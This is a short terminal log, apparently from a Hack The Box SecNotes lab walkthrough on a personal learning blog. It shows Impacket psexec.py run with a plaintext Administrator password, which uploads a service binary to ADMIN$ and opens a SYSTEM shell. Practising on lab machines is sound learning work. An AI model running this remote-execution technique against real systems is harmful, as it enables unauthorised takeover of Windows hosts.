root@Kali:~/HTB/SecNotes# psexec.py 'Administrator':'u6!4ZwgwOM#^OBf#Nwnh'@secnotes.htb Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation [*] Requesting shares on secnotes.htb..... [*] Found writable share ADMIN$ [*] Uploading file LlYReNNI.exe [*] Opening SVCManager on secnotes.htb..... [*] Creating service YlCi on secnotes.htb..... [*] Starting service YlCi..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.17134.228] (c) 2018 Microsoft Corporation. All rights reserved. C:\WINDOWS\system32>whoami nt authority\system
Ivan's IT learning blog 